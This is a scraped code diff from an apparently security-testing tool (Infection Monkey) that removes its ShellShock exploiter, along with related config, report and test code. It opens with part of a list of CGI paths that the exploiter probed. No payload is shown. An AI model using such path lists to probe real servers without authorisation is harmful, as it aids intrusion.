r"/cgi-bin/r.cgi",
|
||||
r"/cgi-bin/register.cgi",
|
||||
r"/cgi-bin/replicator/webpage.cgi/",
|
||||
r"/cgi-bin/responder.cgi",
|
||||
r"/cgi-bin/robadmin.cgi",
|
||||
r"/cgi-bin/robpoll.cgi",
|
||||
r"/cgi-bin/rtpd.cgi",
|
||||
r"/cgi-bin/sbcgi/sitebuilder.cgi",
|
||||
r"/cgi-bin/scoadminreg.cgi",
|
||||
r"/cgi-bin-sdb/printenv",
|
||||
r"/cgi-bin/sdbsearch.cgi",
|
||||
r"/cgi-bin/search",
|
||||
r"/cgi-bin/search.cgi",
|
||||
r"/cgi-bin/search/search.cgi",
|
||||
r"/cgi-bin/sendform.cgi",
|
||||
r"/cgi-bin/shop.cgi",
|
||||
r"/cgi-bin/shopper.cgi",
|
||||
r"/cgi-bin/shopplus.cgi",
|
||||
r"/cgi-bin/showcheckins.cgi",
|
||||
r"/cgi-bin/simplestguest.cgi",
|
||||
r"/cgi-bin/simplestmail.cgi",
|
||||
r"/cgi-bin/smartsearch.cgi",
|
||||
r"/cgi-bin/smartsearch/smartsearch.cgi",
|
||||
r"/cgi-bin/snorkerz.bat",
|
||||
r"/cgi-bin/snorkerz.bat",
|
||||
r"/cgi-bin/snorkerz.cmd",
|
||||
r"/cgi-bin/snorkerz.cmd",
|
||||
r"/cgi-bin/sojourn.cgi",
|
||||
r"/cgi-bin/spin_client.cgi",
|
||||
r"/cgi-bin/start.cgi",
|
||||
r"/cgi-bin/status",
|
||||
r"/cgi-bin/status_cgi",
|
||||
r"/cgi-bin/store/agora.cgi",
|
||||
r"/cgi-bin/store.cgi",
|
||||
r"/cgi-bin/store/index.cgi",
|
||||
r"/cgi-bin/survey.cgi",
|
||||
r"/cgi-bin/sync.cgi",
|
||||
r"/cgi-bin/talkback.cgi",
|
||||
r"/cgi-bin/technote/main.cgi",
|
||||
r"/cgi-bin/test2.pl",
|
||||
r"/cgi-bin/test-cgi",
|
||||
r"/cgi-bin/test.cgi",
|
||||
r"/cgi-bin/testing_whatever",
|
||||
r"/cgi-bin/test/test.cgi",
|
||||
r"/cgi-bin/tidfinder.cgi",
|
||||
r"/cgi-bin/tigvote.cgi",
|
||||
r"/cgi-bin/title.cgi",
|
||||
r"/cgi-bin/top.cgi",
|
||||
r"/cgi-bin/traffic.cgi",
|
||||
r"/cgi-bin/troops.cgi",
|
||||
r"/cgi-bin/ttawebtop.cgi/",
|
||||
r"/cgi-bin/ultraboard.cgi",
|
||||
r"/cgi-bin/upload.cgi",
|
||||
r"/cgi-bin/urlcount.cgi",
|
||||
r"/cgi-bin/viewcvs.cgi",
|
||||
r"/cgi-bin/view_help.cgi",
|
||||
r"/cgi-bin/viralator.cgi",
|
||||
r"/cgi-bin/virgil.cgi",
|
||||
r"/cgi-bin/vote.cgi",
|
||||
r"/cgi-bin/vpasswd.cgi",
|
||||
r"/cgi-bin/way-board.cgi",
|
||||
r"/cgi-bin/way-board/way-board.cgi",
|
||||
r"/cgi-bin/webbbs.cgi",
|
||||
r"/cgi-bin/webcart/webcart.cgi",
|
||||
r"/cgi-bin/webdist.cgi",
|
||||
r"/cgi-bin/webif.cgi",
|
||||
r"/cgi-bin/webmail/html/emumail.cgi",
|
||||
r"/cgi-bin/webmap.cgi",
|
||||
r"/cgi-bin/webspirs.cgi",
|
||||
r"/cgi-bin/Web_Store/web_store.cgi",
|
||||
r"/cgi-bin/whois.cgi",
|
||||
r"/cgi-bin/whois_raw.cgi",
|
||||
r"/cgi-bin/whois/whois.cgi",
|
||||
r"/cgi-bin/wrap",
|
||||
r"/cgi-bin/wrap.cgi",
|
||||
r"/cgi-bin/wwwboard.cgi.cgi",
|
||||
r"/cgi-bin/YaBB/YaBB.cgi",
|
||||
r"/cgi-bin/zml.cgi",
|
||||
r"/cgi-mod/index.cgi",
|
||||
r"/cgis/wwwboard/wwwboard.cgi",
|
||||
r"/cgi-sys/addalink.cgi",
|
||||
r"/cgi-sys/defaultwebpage.cgi",
|
||||
r"/cgi-sys/domainredirect.cgi",
|
||||
r"/cgi-sys/entropybanner.cgi",
|
||||
r"/cgi-sys/entropysearch.cgi",
|
||||
r"/cgi-sys/FormMail-clone.cgi",
|
||||
r"/cgi-sys/helpdesk.cgi",
|
||||
r"/cgi-sys/mchat.cgi",
|
||||
r"/cgi-sys/randhtml.cgi",
|
||||
r"/cgi-sys/realhelpdesk.cgi",
|
||||
r"/cgi-sys/realsignup.cgi",
|
||||
r"/cgi-sys/signup.cgi",
|
||||
r"/connector.cgi",
|
||||
r"/cp/rac/nsManager.cgi",
|
||||
r"/create_release.sh",
|
||||
r"/CSNews.cgi",
|
||||
r"/csPassword.cgi",
|
||||
r"/dcadmin.cgi",
|
||||
r"/dcboard.cgi",
|
||||
r"/dcforum.cgi",
|
||||
r"/dcforum/dcforum.cgi",
|
||||
r"/debuff.cgi",
|
||||
r"/debug.cgi",
|
||||
r"/details.cgi",
|
||||
r"/edittag/edittag.cgi",
|
||||
r"/emumail.cgi",
|
||||
r"/enter_buff.cgi",
|
||||
r"/enter_bug.cgi",
|
||||
r"/ez2000/ezadmin.cgi",
|
||||
r"/ez2000/ezboard.cgi",
|
||||
r"/ez2000/ezman.cgi",
|
||||
r"/fcgi-bin/echo",
|
||||
r"/fcgi-bin/echo",
|
||||
r"/fcgi-bin/echo2",
|
||||
r"/fcgi-bin/echo2",
|
||||
r"/Gozila.cgi",
|
||||
r"/hitmatic/analyse.cgi",
|
||||
r"/hp_docs/cgi-bin/index.cgi",
|
||||
r"/html/cgi-bin/cgicso",
|
||||
r"/html/cgi-bin/cgicso",
|
||||
r"/index.cgi",
|
||||
r"/info.cgi",
|
||||
r"/infosrch.cgi",
|
||||
r"/login.cgi",
|
||||
r"/mailview.cgi",
|
||||
r"/main.cgi",
|
||||
r"/megabook/admin.cgi",
|
||||
r"/ministats/admin.cgi",
|
||||
r"/mods/apage/apage.cgi",
|
||||
r"/_mt/mt.cgi",
|
||||
r"/musicqueue.cgi",
|
||||
r"/ncbook.cgi",
|
||||
r"/newpro.cgi",
|
||||
r"/newsletter.sh",
|
||||
r"/oem_webstage/cgi-bin/oemapp_cgi",
|
||||
r"/page.cgi",
|
||||
r"/parse_xml.cgi",
|
||||
r"/photodata/manage.cgi",
|
||||
r"/photo/manage.cgi",
|
||||
r"/print.cgi",
|
||||
r"/process_buff.cgi",
|
||||
r"/process_bug.cgi",
|
||||
r"/pub/english.cgi",
|
||||
r"/quikmail/nph-emumail.cgi",
|
||||
r"/quikstore.cgi",
|
||||
r"/reviews/newpro.cgi",
|
||||
r"/ROADS/cgi-bin/search.pl",
|
||||
r"/sample01.cgi",
|
||||
r"/sample02.cgi",
|
||||
r"/sample03.cgi",
|
||||
r"/sample04.cgi",
|
||||
r"/sampleposteddata.cgi",
|
||||
r"/scancfg.cgi",
|
||||
r"/scancfg.cgi",
|
||||
r"/servers/link.cgi",
|
||||
r"/setpasswd.cgi",
|
||||
r"/SetSecurity.shm",
|
||||
r"/shop/member_html.cgi",
|
||||
r"/shop/normal_html.cgi",
|
||||
r"/site_searcher.cgi",
|
||||
r"/siteUserMod.cgi",
|
||||
r"/submit.cgi",
|
||||
r"/technote/print.cgi",
|
||||
r"/template.cgi",
|
||||
r"/test.cgi",
|
||||
r"/ucsm/isSamInstalled.cgi",
|
||||
r"/upload.cgi",
|
||||
r"/userreg.cgi",
|
||||
r"/users/scripts/submit.cgi",
|
||||
r"/vood/cgi-bin/vood_view.cgi",
|
||||
r"/Web_Store/web_store.cgi",
|
||||
r"/webtools/bonsai/ccvsblame.cgi",
|
||||
r"/webtools/bonsai/cvsblame.cgi",
|
||||
r"/webtools/bonsai/cvslog.cgi",
|
||||
r"/webtools/bonsai/cvsquery.cgi",
|
||||
r"/webtools/bonsai/cvsqueryform.cgi",
|
||||
r"/webtools/bonsai/showcheckins.cgi",
|
||||
r"/wwwadmin.cgi",
|
||||
r"/wwwboard.cgi",
|
||||
r"/wwwboard/wwwboard.cgi",
|
||||
)
|
|
@ -18,7 +18,6 @@ BASIC = {
|
|||
"WmiExploiter",
|
||||
"SSHExploiter",
|
||||
"Log4ShellExploiter",
|
||||
"ShellShockExploiter",
|
||||
"ElasticGroovyExploiter",
|
||||
"Struts2Exploiter",
|
||||
"WebLogicExploiter",
|
||||
|
|
|
@ -53,16 +53,6 @@ EXPLOITER_CLASSES = {
|
|||
"link": "https://www.guardicore.com/infectionmonkey/docs/reference"
|
||||
"/exploiters/sshexec/",
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": ["ShellShockExploiter"],
|
||||
"title": "ShellShock Exploiter",
|
||||
"safe": True,
|
||||
"info": "CVE-2014-6271, based on logic from "
|
||||
"https://github.com/nccgroup/shocker/blob/master/shocker.py .",
|
||||
"link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters"
|
||||
"/shellshock/",
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": ["ElasticGroovyExploiter"],
|
||||
|
|
|
@ -68,7 +68,6 @@ class AWSExporter(Exporter):
|
|||
CredentialType.PASSWORD.value: AWSExporter._handle_ssh_issue,
|
||||
CredentialType.KEY.value: AWSExporter._handle_ssh_key_issue,
|
||||
},
|
||||
ExploiterDescriptorEnum.SHELLSHOCK.value.class_name: AWSExporter._handle_shellshock_issue, # noqa:E501
|
||||
"tunnel": AWSExporter._handle_tunnel_issue,
|
||||
ExploiterDescriptorEnum.ELASTIC.value.class_name: AWSExporter._handle_elastic_issue,
|
||||
ExploiterDescriptorEnum.SMB.value.class_name: {
|
||||
|
@ -295,23 +294,6 @@ class AWSExporter(Exporter):
|
|||
instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _handle_shellshock_issue(issue, instance_arn):
|
||||
|
||||
return AWSExporter._build_generic_finding(
|
||||
severity=10,
|
||||
title="Machines are vulnerable to 'Shellshock'",
|
||||
description="Update your Bash to a ShellShock-patched version.",
|
||||
recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. "
|
||||
"The attack was made possible because the HTTP server running on "
|
||||
"TCP port {2} was vulnerable to a "
|
||||
"shell injection attack on the paths: {3}.".format(
|
||||
issue["machine"], issue["ip_address"], issue["port"], issue["paths"]
|
||||
),
|
||||
instance_arn=instance_arn,
|
||||
instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None,
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _handle_smb_password_issue(issue, instance_arn):
|
||||
|
||||
|
|
|
@ -11,9 +11,6 @@ from monkey_island.cc.services.reporting.issue_processing.exploit_processing.pro
|
|||
from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.log4shell import ( # noqa: E501
|
||||
Log4ShellProcessor,
|
||||
)
|
||||
from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.shellshock_exploit import ( # noqa: E501
|
||||
ShellShockExploitProcessor,
|
||||
)
|
||||
from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.zerologon import ( # noqa: E501
|
||||
ZerologonExploitProcessor,
|
||||
)
|
||||
|
@ -34,9 +31,6 @@ class ExploiterDescriptorEnum(Enum):
|
|||
ELASTIC = ExploiterDescriptor(
|
||||
"ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor
|
||||
)
|
||||
SHELLSHOCK = ExploiterDescriptor(
|
||||
"ShellShockExploiter", "ShellShock Exploiter", ShellShockExploitProcessor
|
||||
)
|
||||
STRUTS2 = ExploiterDescriptor("Struts2Exploiter", "Struts2 Exploiter", ExploitProcessor)
|
||||
WEBLOGIC = ExploiterDescriptor(
|
||||
"WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor
|
||||
|
|
|
@ -1,15 +0,0 @@
|
|||
from monkey_island.cc.services.reporting.issue_processing.exploit_processing.processors.exploit import ( # noqa: E501
|
||||
ExploiterReportInfo,
|
||||
ExploitProcessor,
|
||||
)
|
||||
|
||||
|
||||
class ShellShockExploitProcessor:
|
||||
@staticmethod
|
||||
def get_exploit_info_by_dict(class_name: str, exploit_dict: dict) -> ExploiterReportInfo:
|
||||
exploit_info = ExploitProcessor.get_exploit_info_by_dict(class_name, exploit_dict)
|
||||
|
||||
urls = exploit_dict["data"]["info"]["vulnerable_urls"]
|
||||
exploit_info.port = urls[0].split(":")[2].split("/")[0]
|
||||
exploit_info.paths = ["/" + url.split(":")[2].split("/")[1] for url in urls]
|
||||
return exploit_info
|
|
@ -28,7 +28,6 @@ import {drupalIssueOverview, drupalIssueReport} from './security/issues/DrupalIs
|
|||
import {wmiPasswordIssueReport, wmiPthIssueReport} from './security/issues/WmiIssue';
|
||||
import {sshKeysReport, shhIssueReport, sshIssueOverview} from './security/issues/SshIssue';
|
||||
import {elasticIssueOverview, elasticIssueReport} from './security/issues/ElasticIssue';
|
||||
import {shellShockIssueOverview, shellShockIssueReport} from './security/issues/ShellShockIssue';
|
||||
import {log4shellIssueOverview, log4shellIssueReport} from './security/issues/Log4ShellIssue';
|
||||
import {
|
||||
crossSegmentIssueOverview,
|
||||
|
@ -125,11 +124,6 @@ class ReportPageComponent extends AuthComponent {
|
|||
[this.issueContentTypes.REPORT]: elasticIssueReport,
|
||||
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
||||
},
|
||||
'ShellShockExploiter': {
|
||||
[this.issueContentTypes.OVERVIEW]: shellShockIssueOverview,
|
||||
[this.issueContentTypes.REPORT]: shellShockIssueReport,
|
||||
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
||||
},
|
||||
'PowerShellExploiter': {
|
||||
[this.issueContentTypes.OVERVIEW]: powershellIssueOverview,
|
||||
[this.issueContentTypes.REPORT]: powershellIssueReport,
|
||||
|
|
|
@ -1,30 +0,0 @@
|
|||
import React from 'react';
|
||||
import CollapsibleWellComponent from '../CollapsibleWell';
|
||||
|
||||
export function shellShockIssueOverview() {
|
||||
return (<li>Machines are vulnerable to ‘Shellshock’ (<a
|
||||
href="https://www.cvedetails.com/cve/CVE-2014-6271">CVE-2014-6271</a>).
|
||||
</li>)
|
||||
}
|
||||
|
||||
|
||||
function getShellshockPathListBadges(paths) {
|
||||
return paths.map(path => <span className="badge badge-warning" style={{margin: '2px'}} key={path}>{path}</span>);
|
||||
}
|
||||
|
||||
export function shellShockIssueReport(issue) {
|
||||
return (
|
||||
<>
|
||||
Update your Bash to a ShellShock-patched version.
|
||||
<CollapsibleWellComponent>
|
||||
The machine <span className="badge badge-primary">{issue.machine}</span> (<span
|
||||
className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to a <span
|
||||
className="badge badge-danger">ShellShock</span> attack.
|
||||
<br/>
|
||||
The attack was made possible because the HTTP server running on TCP port <span
|
||||
className="badge badge-info">{issue.port}</span> was vulnerable to a shell injection attack on the
|
||||
paths: {getShellshockPathListBadges(issue.paths)}.
|
||||
</CollapsibleWellComponent>
|
||||
</>
|
||||
);
|
||||
}
|
|
@ -52,7 +52,6 @@
|
|||
"SmbExploiter",
|
||||
"WmiExploiter",
|
||||
"SSHExploiter",
|
||||
"ShellShockExploiter",
|
||||
"ElasticGroovyExploiter",
|
||||
"Struts2Exploiter",
|
||||
"ZerologonExploiter",
|
||||
|
|
|
@ -5,7 +5,6 @@
|
|||
"SmbExploiter",
|
||||
"WmiExploiter",
|
||||
"SSHExploiter",
|
||||
"ShellShockExploiter",
|
||||
"ElasticGroovyExploiter",
|
||||
"Struts2Exploiter",
|
||||
"WebLogicExploiter",
|
||||
|
|
|
@ -187,7 +187,6 @@ def test_format_config_for_agent__exploiters(flat_monkey_config):
|
|||
{"name": "DrupalExploiter", "options": {}},
|
||||
{"name": "ElasticGroovyExploiter", "options": {}},
|
||||
{"name": "HadoopExploiter", "options": {}},
|
||||
{"name": "ShellShockExploiter", "options": {}},
|
||||
{"name": "Struts2Exploiter", "options": {}},
|
||||
{"name": "WebLogicExploiter", "options": {}},
|
||||
{"name": "ZerologonExploiter", "options": {}},
|
||||
|
|
|
@ -57,7 +57,6 @@ password_restored # unused variable (monkey/monkey_island/cc/services/reporting
|
|||
SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30)
|
||||
SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31)
|
||||
ELASTIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:32)
|
||||
SHELLSHOCK # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:36)
|
||||
STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39)
|
||||
WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40)
|
||||
HADOOP # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43)
|
||||
|
|
Loading…
Reference in New Issue